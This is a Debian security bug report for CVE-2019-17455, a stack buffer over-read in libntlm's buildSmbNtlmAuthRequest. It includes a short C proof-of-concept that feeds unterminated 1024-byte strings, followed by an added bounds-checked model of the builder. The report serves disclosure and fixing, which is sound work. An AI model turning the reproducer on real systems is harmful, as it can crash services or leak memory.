Source: libntlm
Version: 1.5-2
Severity: important
Tags: security upstream
Forwarded: https://gitlab.com/jas/libntlm/issues/2
Control: found -1 1.5-1

Hi,

The following vulnerability was published for libntlm.

CVE-2019-17455[0]:
| Libntlm through 1.5 relies on a fixed buffer size for
| tSmbNtlmAuthRequest, tSmbNtlmAuthChallenge, and tSmbNtlmAuthResponse
| read and write operations, as demonstrated by a stack-based buffer
| over-read in buildSmbNtlmAuthRequest in smbutil.c for a crafted NTLM
| request.

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2019-17455
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17455
[1] https://gitlab.com/jas/libntlm/issues/2

Please adjust the affected versions in the BTS as needed.

Reproducer for the issue:

,---- [ poc.c ]
| #include<ntlm.h>
| #include<stdio.h>
| #include<stdlib.h>
| #include<string.h>
| extern void buildSmbNtlmAuthRequest(tSmbNtlmAuthRequest * request, const char *user, const char *domain);
| int main (void)
| {
|     char user[1024];
|     char domain[1024];
|     memset(user,'a',1024);
|     memset(domain,'b',1024);
|     tSmbNtlmAuthRequest request;
|     tSmbNtlmAuthChallenge challenge;
|     tSmbNtlmAuthResponse response;
|     buildSmbNtlmAuthRequest (&request, user, domain);
|     return 0;
| }
`----

(compile with ASAN to verify the issue).

Regards,
Salvatore
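
Added example, not part of the original report and not libntlm code: a simplified model of a message struct with a fixed 1024-byte payload buffer, whose builder takes explicit lengths and refuses fields that do not fit, fed the same input sizes as poc.c. The struct layout and all model_* names are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MODEL_BUF_SIZE 1024 /* assumed size, matching the PoC's 1024-byte inputs */

/* Hypothetical, simplified stand-in for a fixed-size NTLM message struct. */
struct model_field { uint16_t len; uint32_t offset; };
struct model_request {
    struct model_field user, domain;
    uint8_t  buffer[MODEL_BUF_SIZE];
    uint32_t buf_index; /* invariant: buf_index <= MODEL_BUF_SIZE */
};

/* Append src[0..len) to the payload; refuse anything that does not fit. */
static int model_add_bytes(struct model_request *r, struct model_field *f,
                           const char *src, size_t len)
{
    if (len > MODEL_BUF_SIZE - r->buf_index)
        return -1;
    memcpy(r->buffer + r->buf_index, src, len);
    f->len = (uint16_t)len;
    f->offset = r->buf_index;
    r->buf_index += (uint32_t)len;
    return 0;
}

/* Explicit lengths: the builder never scans input for a terminator. */
int model_build_request(struct model_request *r, const char *user, size_t user_len,
                        const char *domain, size_t domain_len)
{
    memset(r, 0, sizeof *r);
    if (model_add_bytes(r, &r->user, user, user_len) != 0 ||
        model_add_bytes(r, &r->domain, domain, domain_len) != 0) {
        memset(r, 0, sizeof *r); /* leave no half-built message behind */
        return -1;
    }
    return 0;
}

int main(void)
{
    struct model_request r;
    char user[1024], domain[1024]; /* constructed input, same sizes as poc.c */
    memset(user, 'a', sizeof user);
    memset(domain, 'b', sizeof domain);
    /* Exit status 0 means the oversized pair was rejected as intended. */
    return model_build_request(&r, user, sizeof user, domain, sizeof domain) == -1 ? 0 : 1;
}
```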